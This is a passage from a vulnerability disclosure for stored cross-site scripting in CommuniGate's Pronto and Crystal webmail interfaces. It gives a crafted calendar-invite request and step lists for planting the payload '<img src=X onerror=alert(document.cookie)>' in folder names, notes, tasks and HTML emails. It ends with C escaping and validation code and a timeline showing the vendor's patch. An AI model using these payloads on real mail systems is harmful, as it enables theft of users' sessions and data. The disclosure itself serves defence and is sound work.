sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
Once the victim receives the invitation, he/she will not be obliged to click on any link or download any file. The only condition for this PoC to work is a single click to read the email. Once the victim reads the email, the code gets executed on the victim's browser ending up sending sensitive data to the adversary.
2. Files:
Source webmail: pronto/pronto4/Crystal
Destination webmail: Crystal
In order to leverage this vulnerability, an attacker must first acquire a local mailbox. What he/she will do is the following:
Go to file section.
Create a directory
Name the directory with any JavaScript code, in our case (<img src=X onerror=alert(document.cookie)>)
Share or grant access to victim to be able to at least read the content of the directory
The victim then receives the email granting access to that directory
The victim reads the email and then accesses the directory, ending up executing the code within its scope of work
3. Notes:
Source webmail: Crystal
Destination webmail: Crystal
In order to leverage this vulnerability, an attacker must first acquire a local mailbox. What he/she will do is the following:
Create a note
Put the JavaScript code within it
Share it with the victim
4. Tasks:
Source webmail: pronto/pronto4
Destination webmail: Crystal
In order to leverage this vulnerability, an attacker must first acquire a local mailbox. What he/she will do is the following:
Create a task
Put the JavaScript code within the task name
publish it
5. Inbox
Source webmail: pronto/pronto4
Destination webmail: Crystal
In order to leverage this vulnerability, an attacker must first acquire a local mailbox. What he/she will do is the following:
Create an html file with malicious JavaScript piece of code
Make use of Pronto to send the email to the victim
The victim reads the email using Crystal webmail and the code gets executed.
Remediation:
Sanitize, escape and validate user supplied data accordingly
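The remediation line above in code, as an added example in C (not CommuniGate's code): an HTML escaper for the point where a stored name or title is rendered, plus an allow-list check for names at input time. It assumes the stored values are rendered into HTML text or quoted attribute values; a value dropped inside a script block or a JavaScript string needs a JavaScript-string escaper instead, which this example does not cover.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Output-side fix: escape s for insertion into HTML text or a quoted attribute
 * value.  Writes a NUL-terminated result into out (capacity outsz) and returns
 * its length, or -1 when out is too small (the output is then truncated at an
 * entity boundary and still NUL-terminated, never a half-written entity). */
long html_escape(const char *s, char *out, size_t outsz)
{
    size_t n = 0;
    if (outsz == 0)
        return -1;
    for (; *s; s++) {
        char one[2] = { *s, '\0' };
        const char *rep;
        switch (*s) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (n + rl + 1 > outsz) {   /* +1 keeps room for the terminator */
            out[n] = '\0';
            return -1;
        }
        memcpy(out + n, rep, rl);
        n += rl;
    }
    out[n] = '\0';
    return (long)n;
}

/* Input-side check for user-chosen names (folder names, task names, event
 * titles): refuse control characters and the angle brackets every scenario
 * above relies on.  Defence in depth only; html_escape is still required at
 * every output point, and '&' stays allowed so names like "R&D" keep working. */
bool name_is_safe(const char *s)
{
    if (*s == '\0')
        return false;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (c < 0x20 || c == 0x7f || c == '<' || c == '>')
            return false;
    }
    return true;
}

int main(void)
{
    /* Constructed input: the folder name used in the Files scenario above. */
    const char *evil = "<img src=X onerror=alert(document.cookie)>";
    char buf[128];
    printf("safe name? %s\n", name_is_safe(evil) ? "yes" : "no");
    if (html_escape(evil, buf, sizeof buf) >= 0)
        printf("escaped: %s\n", buf);
    return 0;
}
```

Escaping must happen in every view that renders the value (Crystal, Pronto and Pronto4 each have their own templates), which is why the input-side check is worth keeping as well: a value that never contained markup cannot hurt a view that forgets to escape.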
Vulnerability Disclosure Timeline:
==================================
23 Nov, 17 5:36:09 PM: Vendor Notification
23 Nov, 17 6:56:33 PM: Vendor Response/Feedback
24 Nov, 17 : Vendor released new patched version 6.2.1 and included fixes on version 6.1.19 as a separate Crystal skin package (to be installed as cluster/server-wide custom skin)